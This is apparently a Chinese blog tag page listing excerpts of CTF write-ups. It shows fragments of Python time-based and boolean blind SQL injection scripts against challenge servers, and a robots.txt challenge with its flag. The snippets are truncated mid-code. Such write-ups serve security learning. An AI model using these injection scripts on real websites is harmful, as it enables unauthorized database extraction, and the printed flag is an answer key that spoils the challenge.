首页 > TAG信息列表 > f1ag
时间盲注
import requests import string url = 'http://127.0.0.1/sql/p8/index.php?id=2' #url flag = '' for i in range(1,30): l,r = 32, 127 while l < r: m = (l+r) // 2 payload = '-if(ascii(substr((select group_con[GYCTF2020]Ezsqli
布尔盲注 无列名注入 测试 id=1 ==>Nu1L id=2 ==>V&N id=2-1 ==>Nu1L 贴一下脚本 # coding:utf-8 import requests import time url = 'http://14b858fa-e701-47da-a11a-304ef60eb42d.node3.buuoj.cn/' def str_hex(s): #十六进制转换 fl ==> 0x666c res = 'robots
题目:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。 打开场景,在链接末尾加上/robots.txt 发现f1ag_1s_h3re.php不能被爬取 打开f1ag_1s_h3re.php页面: 得到flag:cyberpeace{88a11569930b1012300ef285e06cb81c}